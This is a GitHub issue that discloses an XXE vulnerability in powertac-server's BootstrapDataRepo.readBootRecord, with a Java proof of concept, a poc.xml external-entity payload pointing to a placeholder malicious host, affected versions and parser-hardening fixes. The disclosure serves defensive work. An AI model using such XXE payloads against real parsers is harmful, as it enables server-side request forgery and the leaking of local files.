Skip to content
New issue

Have a question about this project? # for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “#”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? # to your account

Potential XXE(XML External Entity Injection) under BootstrapDataRepo.java readBootRecord function #1166

Open
JAckLosingHeart opened this issue Oct 22, 2024 · 0 comments

Comments

@JAckLosingHeart
Copy link

JAckLosingHeart commented Oct 22, 2024

Hi team,

Description:
A XXE vulnerability might be exploited when reading Bootstrap data from XML files:
image

image
Since the DocumentBuilderFactory instance here does not enable security settings or disable external entities loading, which leads to potential XXE exploitation if the URL or the file behind URL is under control of the malicious guys, leading to SSRF, information leak and so on

POC:

import org.powertac.common.repo.BootstrapDataRepo;

import java.net.MalformedURLException;
import java.net.URL;

public class PowertacPoC {
    public static void main(String[] args) throws MalformedURLException {
        BootstrapDataRepo bootstrapDataRepo = new BootstrapDataRepo();
        URL maliciousXMLURL = new URL("file:poc.xml");
        bootstrapDataRepo.readBootRecord(maliciousXMLURL);
    }
}

poc.xml:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://replace.with.malicious.website">]>
<root>&xxe;</root>

And I can see the request in from the other side(malicious website)

Recommendation:
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or

factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

Affected Component:
https://mvnrepository.com/artifact/org.powertac/server-interface <= 1.9.0
https://github.com/powertac/powertac-server <= powertac-server-1.9.0

# for free to join this conversation on GitHub. Already have an account? # to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant